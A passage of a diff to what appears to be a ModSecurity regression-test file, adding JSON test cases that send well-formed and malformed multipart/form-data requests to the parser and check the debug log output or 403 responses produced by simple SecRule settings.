- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"name\"\r\n",
- "\r\n",
- "Brian Rectanus\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"email\"\r\n",
- "\r\n",
- "brian.rectanus@breach.com\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r\n",
- "Content-Type: image/jpeg\r\n",
- "\r\n",
- "BINARYDATA1\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r\n",
- "Content-Type: image/jpeg\r\n",
- "\r\n",
- "BINARYDATA2\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r\n",
- "Content-Type: image/jpeg\r\n",
- "\r\n",
- "BINARYDATA3\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"test\"\r\n",
- "\r\n",
- "This is test data.\r\n",
- "--0000--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Upload file limit exceeded"
- },
- "rules":[
- "SecRuleEngine On",
- "SecUploadKeepFiles On",
- "SecUploadDir /tmp",
- "SecUploadFileLimit 2",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500161\"",
- "SecRule MULTIPART_FILE_LIMIT_EXCEEDED \"!@eq 1\" \"phase:2,deny,id:500162\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500163\"",
- "SecRule &FILES \"!@eq 3\" \"phase:2,deny,id:500164\"",
- "SecRule &FILES_NAMES \"!@eq 3\" \"phase:2,deny,id:500165\"",
- "SecRule &FILES_SIZES \"!@eq 3\" \"phase:2,deny,id:500166\"",
- "SecRule FILES_SIZES:/^image/ \"@eq 0\" \"phase:2,deny,id:500167\"",
- "SecRule &FILES_TMPNAMES \"!@eq 2\" \"phase:2,deny,id:500168\""
- ]
+[
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (normal)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA\r\n",
+ "--0000--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Added file part to the list: name \"image\" file name \"image.jpg\" \\(offset 258, length 10\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (final CRLF)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\""
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (no final CRLF)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\""
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary contains \"boundary\")",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=------------------------------------------------boundary",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--------------------------------------------------boundary\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "--------------------------------------------------boundary\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "--------------------------------------------------boundary--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\""
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (boundary contains \"bOuNdArY\")",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------0xKhTmLbOuNdArY",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------0xKhTmLbOuNdArY\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "----------0xKhTmLbOuNdArY\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "----------0xKhTmLbOuNdArY--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"1\""
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (data contains \"--\")",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "--test\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "--\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"--test\""
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser error (no final boundary)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Final boundary missing"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser error (no disposition)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Part missing Content-Disposition header"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser error (bad disposition)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Invalid Content-Disposition header"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser error (no disposition name)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Content-Disposition header missing name field"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser error (no disposition name)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ ":\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"nvalid part header \\(header name missing\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRequestBodyAccess On",
+ "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (part header folding - space)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"name: a.*variable: 1.*"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
+ "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
+ "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (part header folding - tab)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"name: a.*variable: 1.*"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
+ "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
+ "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (part header folding - mixed)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"name: a.*variable: 1.*"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
+ "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
+ "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (part header folding - invalid)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\fname=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"name: a.*variable: 1.*"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
+ "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
+ "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (part header folding - mixed invalid)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\f\tname=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"name: a.*variable: 1.*"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
+ "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
+ "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (data after final boundary)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"name: a.*variable: 1.*",
+ "http_code": 403
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_DATA_AFTER \"@eq 1\" \"phase:2,deny,status:403,id:500074\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (C-D uses single quotes)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646",
